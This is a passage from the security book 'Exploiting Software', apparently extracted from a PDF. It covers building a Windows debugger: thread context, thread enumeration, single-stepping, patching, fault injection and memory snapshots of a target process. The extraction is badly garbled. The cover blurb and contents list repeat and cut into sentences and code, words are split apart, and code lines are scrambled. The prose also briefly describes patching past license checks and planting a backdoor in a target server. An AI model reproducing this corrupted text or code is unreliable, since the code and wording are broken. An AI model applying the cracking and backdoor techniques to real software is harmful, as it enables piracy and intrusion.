cr aft ing m aliciou s inpu t _error_out("[!] OpenThread failed ! \n"); The t echn ical det ails of b uf fer ov er f low s return FALSE; Root k it s } Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. ctx.ContextFlags = CONTEXT_FULL; if(!::GetThreadContext(hThread, &ctx)) { _error_out("[!] GetThreadContext failed ! \n");

return FALSE; }

• •

ctx.Eip = theEIP;

Table of Content s I ndex

ctx.ContextFlags = CONTEXT_FULL;

Expl oit ing Softw a re How to Br e ak Code

By Gr eg Hoglund , Gar y McGr aw if(!::SetThreadContext(hThread,

&ctx))

{ lish er: Addison Wesley Pub Pub Dat e: February 17, 200 4

_error_out("[!] SetThreadContext failed ! \n");

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

return FALSE;

}

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew CloseHandle(hThread); alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om return TRUE; at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . } This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem From t his ex amp le you can see h ow t o read and set t he t hr ead cont ex t st r uct ur e. The t hr ead con st r uctWhen ur e is net f ully docum entited t h anisms e Micr osoft w or k secur y minech do nheader ot w or kf iles. Not e t h at t h e cont ext f lag CONTEXT_F is set du rin g a get or set op er at ion . This allow s y ou t o cont r ol all t he dat a v alu es of t he t h read cont ex r uct urte. Att t st ack pat er ns Rem em b er se t o engineer close youinr gt hr ead h andle w h en y ou are f inished w it h t h e operat ion or else y ou w ill Rev cause a r esour ce leak p rob lem . Th e ex am ple uses an API call called OpenThread. I f y ou can not l y our pClassic rog ramatttoacks OpenThread ag ainst serv y ouerwsoft ill need w ar et o im por t t h e call m anually . This has been don e in t h exam ple, w hich uses a f unct ion point er n amed fOpenThread. To init ialize fOpenThread y ou m us at t acks clien softKERNEL32.DLL: war e im porSur t t hpr e ising fu nct ion pointag erainst dir ect ly f rt om Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. typedef void * (__stdcall *FOPENTHREAD) (

DWORD dwDesiredAccess, // Access right BOOL bInheritHandle,

// Handle inheritance option

DWORD dwThreadId

// Thread identifier

); •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code

FOPENTHREAD fOpenThread=NULL; By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley

fOpenThread = (FOPENTHREAD) Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

GetProcAddress( Pages: 51 2 GetModuleHandle("kernel32.dll"), "OpenThread" ); How d oes sof t wif(!fOpenThread) are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can{be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a _error_out("[!] re is loaded w it h exfailed amp les of t ack s, at t ack function!\n"); pat t er ns, t ools, an d tor eal getat openthread t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st} fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t This isWhy a par ul wb ill lock codet obecau illu st es h ow t o define a fu nct ion and imp o soft icular t w ar elyexusef ploit conoft inue be a se seritious p rat r oblem fr om a DLL m an ually. You m ay u se v ar iat ions of t h is sy nt ax for alm ost an y exp ort ed DLL f unct io When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Enumerate Threads or Processes Rev er se engineer in g Using t h e " t oolhelp" API t hat is supp lied w it h W in dow s y ou can qu er y all r u nning pr ocesses and t hr eads. You at can useag t his code t oerqusoft er ywall Classic t acks ainst serv ar er un ning t h reads in y our d eb ug t ar get . Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak // For the target process, build a soft w ar e. // thread structure for each thread.

HANDLE

hProcessSnap = NULL;

hProcessSnap = CreateToolhelp32Snapshot(

TH32CS_SNAPTHREAD, mPID); if (hProcessSnap == INVALID_HANDLE_VALUE) { • •

Table of Content s

_error_out("toolhelp snap failed\n"); I ndex

Expl oit ing Softw a re How to Br e ak Code

return;

By Gr eg Hoglund , Gar y McGr aw

} Pub lish er: Addison Wesley

else Pub

Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

{

Pages: 51 2

THREADENTRY32 the; the.dwSize = sizeof(THREADENTRY32); How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed o b reak soft war e?hProcessSnap, Th is book p rov ides t he answ er s. BOOL bret = tThread32First( &the); Ex p lo i t in while(bret) g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou { m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he // Create a thread structure. scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t if(the.th32OwnerProcessID == mPID) Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem { When net w or k secur it y m ech anisms do n ot w or k CDThread *aThread = new CDThread; At t ack pat t er ns aThread->m_thread_id = the.th32ThreadID; Rev er se engineer in g aThread->m_hProcess = m_hProcess; Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e mThreadList.push_back( aThread ); Tech niqu es f or cr aft ing m aliciou s inpu t } The t echn ical det ails of b uf fer ov er f low s Root k it s bret = Thread32Next(hProcessSnap, &the); Ex p lo i t in } g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. }

I n t his exam p le, a CDThread ob ject is b eing b uilt an d init ialized f or each t hr ead . The t h r ead st r u t hat is obt ain ed , THREAD ENTRY3 2, has man y int er est ing v alues t o t he debu gger . We encour age t o ref er ence t he Micr osoft docum ent at ion on t his API . Not e t h at t h e code checks t he ow ner pr oce

ident if icat ion ( PI D) for each t hr ead t o m ake sur e it belongs t o t h e debug t ar get pr ocess.

Single Stepping Tr acin g t he f low of pr ogr am execut ion is v er y im por t ant w hen you w ant t o kn ow if t he at t ack er ( m ayb e y ou) can cont r ol logic. For ex amp le, if t h e 13 t h b yt e of t he p ack et is b eing p assed t o a sw •st at ement , t he Table Content s r ols t he sw it ch st at em ent by v irt ue of t he fact t hat t he at t ack er con t at of t ack er cont •t he 13t h by t Iendex of t he pack et . Expl oit ing Softw a re How to Br e ak Code

Single st epp in, Gar g isy a f eat By Gr eg Hoglund McGr awu re of t he x 86 chipset . Ther e is a special flag ( called TRAP FLAG) in t h e pr ocessor t h at , if set , will cau se on ly a single in st r uct ion t o be execut ed follow ed b y an in t er r up t Using t h e sin gle- st ep int er ru pt , a debu gger can ex am ine each an d ev ery in st r u ct ion t hat is Pub lish er: Addison Wesley execut ing . You can also ex amin e m em or y at each st ep using t h e rou t ines list ed earlier . I n f act , t Pub Dat e: February 17, 200 4 exact ly w hat a t ool called The PI T d oes.[ 15] Th ese t echn iq ues ar e all fair ly simp le, but w hen p r op I SBN: t020 1-result 786 95 -8in a ver y pow er ful debug ger. com bined, h ey Pages: 51 2 [ 15]

The PI T tool is av ailable at http: / / w w w .hbgar y.com .

To p ut t he p rocessor in t o single st ep, you m ust set t he single- st ep f lag. The follow in g cod e illu st how t o d o t h is: How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he bool SetSingleStep() scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t { Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem CONTEXT ctx; When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns HANDLE hThread = Rev er se engineer in g fOpenThread( Classic at t acks ag ainst serv er soft w ar e THREAD_ALL_ACCESS, Sur pr ising at t acks ag ainst clien t soft war e FALSE, Tech niqu es f or cr aft ing m aliciou s inpu t m_thread_id The t echn ical det ails of b uf fer ov er f low s Root k it s

);

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. if(hThread == NULL) { _error_out("[!] Failed to Open the BPX thread !\n"); return FALSE;

}

// Rewind one instruction. This means no manual snapshots anymore. ctx.ContextFlags = CONTEXT_FULL; • •

Table of Content s

if(!::GetThreadContext(hThread, &ctx)) I ndex

Expl oit ing Softw a re How to Br e ak Code

{

By Gr eg Hoglund , Gar y McGr aw

_error_out("[!] GetThreadContext failed ! \n"); Pub lish er: Addison Wesley

return Pub Dat e: February FALSE; 17, 200 4 I SBN: 0- 20 1- 786 95 -8

}

Pages: 51 2

// Set single step for this thread. ctx.EFlags |= TF_BIT ; How ctx.ContextFlags d oes sof t w are br eak ?= How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are CONTEXT_FULL; fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Whatif(!::SetThreadContext(hThread, t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. &ctx)) Ex p lo {i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n hSetThreadContext ow r eal at t acks are really carr!ied ou t . _error_out("[!] failed \n"); This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he return FALSE; scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t } Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k CloseHandle(hThread); At t ack pat t er ns return TRUE; Rev er se engineer in g } Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t Not e t h at w e inf luence t he trace f lag by using t h e t hr ead cont ex t st r uct u res. The t hr ead I D is st in a v ar iab le called m_thread_id. To sin gle st ep a m ult it hr eaded p rog r am, all t hr eads m ust be s The t echn ical det ails of b uf fer ov er f low s single st ep. Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Patching soft w ar e. I f you ar e using our kin d of b reak point s, y ou hav e alr ead y ex per ien ced pat chin g. By r eading t he or iginal b yt e of an in st r u ct ion and r eplacin g it w it h 0xCC, y ou pat ched t he or iginal pr ogr am ! Of cour se t he t echniq ue can be used t o p at ch in m uch m or e t h an a sin gle inst r uct ion. Pat ch in g can used t o insert br anchin g st at em ent s, new code block s, and ev en t o over w rit e st at ic dat a. Pat chin one w ay t hat sof t w ar e pir at es hav e cr ack ed dig it al copy rig ht m echanism s. I n f act , m any int er est t hin gs ar e m ade p ossible b y ch angin g on ly a single j um p st at em ent . For ex am ple, if a pr ogr am h block of code t h at checks t he licen se f ile, all t he sof t w are p irat e need s t o d o is inser t a jum p t h a br anches ar oun d t he licen se check . [ 16] I f y ou are in t erest ed in soft w ar e cr ack ing, t her e ar e lit er a

t hou san ds of d ocu ment s on t he Net p ublished on t h e subj ect . These ar e easily locat ed on t he I nt er net b y googling " soft war e cr acking . " [ 16]

This ver y basic appr oach is no longer used mu ch in practice. Mor e com plicated schem es ar e discussed in Bu ildin g Secu r e Soft w ar e [ Viega and McGraw , 20 01] .

Pat ching is an im por t ant sk ill t o lear n. I t allow s you , in man y cases, t o fix a sof t w ar e bug . Of cou it also allow s y ou t o inser t a soft w ar e bu g. You m ay k now t hat a cer t ain file is b eing u sed by t h e ser e ofofyContent our t arsget . You can inser t a helpf ul b ack door using pat ching t echniqu es. Th e • v er sof t w ar Table a ple of a sof t w are pat ch ( pat ching t h e NT k er n el) discu ssed in Ch apt er 8. • g ood ex amI ndex Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Fault Injection Pub lish er: Addison Wesley

Fault ject can 17, t ak200 em PubinDat e: ion February 4 any for m s [ Voas and McGr aw , 1 999 ] . At it s m ost b asic, t h e idea is sim t o su pply st 0r ang or95un I SBN: 20 1-e786 -8 ex pect ed inp ut s t o a sof t w are pr ogr am and see w hat h appens. Var iat ions t he t echn ique in volv e m ut at ing t h e code and inj ect ing cor r upt ion int o t he d at a h eap or p rog ram Pages: 51 2 st ack. The goal is t o cause t h e soft w ar e t o fail in int er est ing w ay s. Using f ault in ject ion, soft w ar e w ill alway s f ail. The q uest ion is how d oes it f ail? Does t he sof t w are in a w ay t h at allow s an at t acker t o gain access t o t he sy st em ? D oes t he soft w ar e r eveal secr et inf orm at ion? Does t h e failur e r esu lt in a cascad e failur e t h at af fect s ot her p art s of t he sy st em ? How d oes eak ? dam Howage do at s mem akeindicat sof t wearae fau br eak on pant ur pose? Why are Failu res t hsof at dt wo are not br cause t ot acker t h e syst lt - t oler syst em . fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can isbeonuesed o bm reak e? tTh book ides t heever answinv er ent s. ed, y et it r em ains o Fault in ject ion of t he ost soft p owwar er f ul estising m etphrov odologies t he most und er used by com mer cial sof t w ar e v en dor s. This is one of t he r eason s w hy com mer cia Ex loar i teinhas g S osoft w re isbuloaded w it hMany ex amp of r eal ack s, at t ack t er ns, anph d ilosoph softpw m aany gs t od ay. so-les called softat wtar e engin eer spat subscr ib et ools, t o t he echniqu es used sof t wnecessar ar e. I f yily ou rw ant st oinpsecu rot ect our bug sof t-wfrar fr om but it tt hat a rigid soft wby ar ebad d evguy elopsmt oenbrt eak pr ocess esult re yand eee code, at t ack , y ily ou so. m u st lear n h ow r eal at t acks are really t . t a solid t est ing st rat egy , cod necessar Thfir e rsteal w orld has sh own u s repeat edly carr t h atied w itou hou w ill alw ays h ave dang er ous bug s. I t ' s alm ost am using ( fr om an at t ack er' s per spect iv e) t o kn ow Thiswm h ave ay shock ou—and it will cer e ost y ou. Get ond ttoday he . Th soft arust e t-est ing book is st illmreceiv ing tyhe most meager oft ainly b udg educat et s in m sof t wt ing are bey h ouses scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t m ean s t he wor ld w ill belong t o t h e at t ack er s f or m any y ears t o com e. Fault in ject ion on soft w ar e inp ut is a good w ay t o t est for vu lnerab ilit ies. The r eason is sim ple: T Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem at t ack er con t rols t he soft w ar e inp ut , so it 's n at ur al t o t est ever y possib le inpu t com binat ion t hat at t ack er can supp ly. Ev en t ually y ou ar e b ound t o find a com bin at ion t h at ex ploit s t he sof t w ar e, When net w or k secur it y m ech anisms do n ot w or k r ight ?! [ 17] At t ack pat t er ns [ 17]

Of course n ot! But the technique does actually w or k in some cases.

Rev er se engineer in g ClassicSnapshots at t acks ag ainst serv er soft w ar e Process Sur pr ising at t acks ag ainst clien t soft war e When a b reak point fir es, t he p rog ram becom es f rozen in mid r un. All ex ecut ion in all t hr ead s is st opped. I t is possible at t his poin t t o use t he mem or y r out ines t o read or w r it e any p art of t he Tech niqu es f or cr aft ing m aliciou s inpu t pr ogr am m em ory . A t y pical pr ogr am w ill h ave sever al r elev ant m em or y sect ions. Th is is a snap s of m em or tyechn f romical t hedet n ame serb ver BIsND 9 .0 2 und er W in dow s NT: The ails of uf ferr un ovning er f low Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

named.exe: Found memory based at 0x00010000, size 4096

Found memory based at 0x00020000, size 4096 Found memory based at 0x0012d000, size 4096 Found memory based at 0x0012e000, size 8192 Found memory based at 0x00140000, size 184320 •

Table of Content s



I ndex

Found memory based at 0x00240000, size 24576 Expl oit ing Softw a re How to Br e ak Code

Found memory based at 0x00250000, size 4096 By Gr eg Hoglund , Gar y McGr aw

Found memory based at 0x00321000, size 581632 Pub lish er: Addison Wesley

Found memory based at4 0x003b6000, size 4096 Pub Dat e: February 17, 200 I SBN: 0- 20 1- 786 95 -8

Found memory based at 0x003b7000, size 4096 Pages: 51 2

Found memory based at 0x003b8000, size 4096 Found memory based at 0x003b9000, size 12288 How d oes sof t w are br eak How do at t acker s m ake Found memory based at? 0x003bc000, size 8192sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sedat t o 0x003be000, b reak soft war e? Th is8192 book p rov ides t he answ er s. Found memory based size Ex p lo i tmemory in g S o ftbased w a re isat loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Found 0x003c0000, size 8192 t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , memory y ou m u stbased fir st lear h ow r eal at t acks really carr ied ou t . Found at n0x003c2000, sizeare8192 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he Found memory based at 0x003c4000, size 4096 scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Found memory based at 0x003c5000, size 4096 Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Found memory based at 0x003c6000, size 12288 When net w or k secur it y m ech anisms do n ot w or k Found memory based at 0x003c9000, size 4096 At t ack pat t er ns Found memory based at 0x003ca000, size 4096 Rev er se engineer in g Found memory based at 0x003cb000, size 4096 Classic at t acks ag ainst serv er soft w ar e Found memory based at 0x003cc000, size 8192 Sur pr ising at t acks ag ainst clien t soft war e Found memory based at 0x003e1000, size 12288 Tech niqu es f or cr aft ing m aliciou s inpu t Found memory based at 0x003e5000, size 4096 The t echn ical det ails of b uf fer ov er f low s FoundRoot memory k it s based at 0x003f1000, size 24576 Found 0x003f8000, size Ex p lo i tmemory in g S o ftbased w a re isat f illed wit h t h e t ools, con4096 cept s, and kn ow ledg e necessar y t o b reak soft w ar e. Found memory based at 0x0042a000, size 8192 Found memory based at 0x0042c000, size 8192 Found memory based at 0x0042e000, size 8192 Found memory based at 0x00430000, size 4096

Found memory based at 0x00441000, size 491520 Found memory based at 0x004d8000, size 45056 Found memory based at 0x004f1000, size 20480 Found memory based at 0x004f7000, size 16384 •

Table of Content s



I ndex

Found memory based at 0x00500000, size 65536 Expl oit ing Softw a re How to Br e ak Code

Found memory based at 0x00700000, size 4096 By Gr eg Hoglund , Gar y McGr aw

Found memory based at 0x00790000, size 4096 Pub lish er: Addison Wesley

Found memory based at4 0x0089c000, size 4096 Pub Dat e: February 17, 200 I SBN: 0- 20 1- 786 95 -8

Found memory based at 0x0089d000, size 12288 Pages: 51 2

Found memory based at 0x0099c000, size 4096 Found memory based at 0x0099d000, size 12288 How d oes sof t w are br eak How do at t acker s m ake Found memory based at? 0x00a9e000, size 4096sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sedat t o 0x00a9f000, b reak soft war e? Th is4096 book p rov ides t he answ er s. Found memory based size Ex p lo i tmemory in g S o ftbased w a re isat loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Found 0x00aa0000, size 503808 t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , memory y ou m u stbased fir st lear h ow r eal at t acks really carr ied ou t . Found at n0x00c7e000, sizeare4096 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he Found memory based at 0x00c7f000, size 135168 scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Found memory based at 0x00cae000, size 4096 Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Found memory based at 0x00caf000, size 4096 When net w or k secur it y m ech anisms do n ot w or k Found memory based at 0x0ffed000, size 8192 At t ack pat t er ns Found memory based at 0x0ffef000, size 4096 Rev er se engineer in g Found memory based at 0x1001f000, size 4096 Classic at t acks ag ainst serv er soft w ar e Found memory based at 0x10020000, size 12288 Sur pr ising at t acks ag ainst clien t soft war e Found memory based at 0x10023000, size 4096 Tech niqu es f or cr aft ing m aliciou s inpu t Found memory based at 0x10024000, size 4096 The t echn ical det ails of b uf fer ov er f low s FoundRoot memory k it s based at 0x71a83000, size 8192 Found 0x71a95000, size Ex p lo i tmemory in g S o ftbased w a re isat f illed wit h t h e t ools, con4096 cept s, and kn ow ledg e necessar y t o b reak soft w ar e. Found memory based at 0x71aa5000, size 4096 Found memory based at 0x71ac2000, size 4096 Found memory based at 0x77c58000, size 8192 Found memory based at 0x77c5a000, size 20480

Found memory based at 0x77cac000, size 4096 Found memory based at 0x77d2f000, size 4096 Found memory based at 0x77d9d000, size 8192 Found memory based at 0x77e36000, size 4096 •

Table of Content s



I ndex

Found memory based at 0x77e37000, size 8192 Expl oit ing Softw a re How to Br e ak Code

Found memory based at 0x77e39000, size 8192 By Gr eg Hoglund , Gar y McGr aw

Found memory based at 0x77ed6000, size 4096 Pub lish er: Addison Wesley

Found memory based at4 0x77ed7000, size 8192 Pub Dat e: February 17, 200 I SBN: 0- 20 1- 786 95 -8

Found memory based at 0x77fc5000, size 20480 Pages: 51 2

Found memory based at 0x7ffd9000, size 4096 Found memory based at 0x7ffda000, size 4096 How d oes sof t w are br eak How do at t acker s m ake Found memory based at? 0x7ffdb000, size 4096sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sedat t o 0x7ffdc000, b reak soft war e? Th is4096 book p rov ides t he answ er s. Found memory based size Ex p lo i tmemory in g S o ftbased w a re isat loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Found 0x7ffdd000, size 4096 t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , memory y ou m u stbased fir st lear h ow r eal at t acks really carr ied ou t . Found at n0x7ffde000, sizeare4096 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he Found memory based at 0x7ffdf000, size 4096 scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem You can r ead t hese m em sect ions and or ew tor hem. You can t hin k of t his as a snapshot of t h When netall w or k secur it yormyech anisms do st n ot k pr ogr am . I f y ou allow t he pr ogr am t o cont inu e execut ing , y ou can fr eez e it at any t im e in t he f u using At anot t ack h er patbrt er eak nspoin t . At any poin t w her e t he pr ogr am is fr ozen, you can t hen w r it e b ack t he or iginal m em ory t hat you sav ed earlier . This eff ect iv ely " rest ar t s" t h e pr ogr am at t he p oin t w h er Rev er sesnap engineer g means you can con t inually k eep " r ew ind ing" t he p rog r am in t im e. y ou t ook t he sh ot .inThis Classic at ttacks er soft e niqu e. You can t ak e a snap sh ot of a pr ogr am and For aut om at ed est inag g, ainst t h is isserv a pow er fuwl ar t ech r est ar t it . Aft er r est orin g t h e m em or y y ou can t h en f id dle w it h mem or y, add corr up t ion, or sim u Surt pr t acks clien soft war dif fer en t y ising pes ofatat t ack ag inpainst ut . Th en , t once r unening, t he p rog ram w ill act on t he f ault y inp ut . You app ly t his pr ocess in a loop an d k eep t est ing t he sam e code w it h dif fer en t per t ur bat ion of inp ut . esoach f or crisaft ing m aliciou inpucan t allow you t o t est m illions of in put com b in at ions. aut omTech at edniqu appr ver y pow er fu lsand The t in echn icale det ails uf fert oovt er f low The f ollow g cod illu st r atof esbhow ake a ssnapshot of a t ar get pr ocess. The code perf or ms a q on t he ent ir e p ossible r ang e of m em or y. For each v alid locat ion, t h e m em or y is copied int o a list Root k it s st r uct ur es: Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

struct mb

{ MEMORY_BASIC_INFORMATION

mbi;

char *p; }; •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code

std: :list gMemList; By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley

void Pubtakesnap() Dat e: February

17, 200 4

I SBN: 0- 20 1- 786 95 -8

{

Pages: 51 2

DWORD start = 0; SIZE_T lpRead; How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Whatwhile(start t ools can be umbi),

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

(void *)&mbi, sizeof(MEMORY_BASIC_INFORMATION));

How d oes sof t w are br eak=? (char How do*)malloc(mbi.RegionSize); at t acker s m ake sof t w ar e br eak on p ur pose? Why are char *p fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools canb->p be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. = p; Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m uif(!ReadProcessMemory( st fir st lear n h ow r eal at t acks are really carr ied ou t . hProcess, This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he (void *)start, p, scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t mbi.RegionSize, &lpRead)) Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem { When net w or k secur it y m ech anisms do n ot w or k TRACE("ReadProcessMemory failed %d\nRead %d", At t ack pat t er ns GetLastError(), lpRead); Rev er se engineer in g } Classic at t acks ag ainst serv er soft w ar e if(mbi.RegionSize != lpRead) Sur pr ising at t acks ag ainst clien t soft war e { Tech niqu es f or cr aft ing m aliciou s inpu t TRACE("Read short bytes %d != %d\n", The t echn ical det ails of b uf fer ov er f low s Root k it s

mbi.RegionSize,

Ex p lo i t in g S o ft w a re islpRead); f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. } gMemList.push_front(b); }

if(start + mbi.RegionSize < start) break; start += mbi.RegionSize; } } •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund aw The cod e uses, Gar t hey McGr VirtualQueryEx

API call t o t est each locat ion of m em or y fr om 0 t o 0xFFFFFF I f a v alid m em ory addr ess is foun d, t h e siz e of t he m em ory r egion is obt ained and t h e next qu er placed j ust ey ondWesley t h e cur rent r eg ion. I n t his w ay t h e same mem or y r eg ion is n ot qu er ied mor e Pub lish er: b Addison once. f t he m em ory is comm it t ed, t hen t his m eans it ' s being used . We check t hat t he PubI Dat e: February 17, region 200 4 m em orI ySBN: is n0-ot r eadonly so t hat we only save m em or y region s t hat m ig ht be m odif ied. Clearly , 20 1- 786 95 -8 r ead - only m emor y is n ot g oin g t o b e mod ified, so t here is no r eason t o save it . I f y ou ar e r eally Pages: 51 2 caref ul, y ou can save all t he m em ory region s. You m ay suspect t h at t he t ar get p r ogr am chang es m em or y p rot ect ions d ur ing ex ecu t ion, f or exam ple. I f you w ant t o rest or e t he p rog r am st at e, you can w rit e back all t he sav ed m em ory regions: How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This msetsnap() ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he void scr ipt 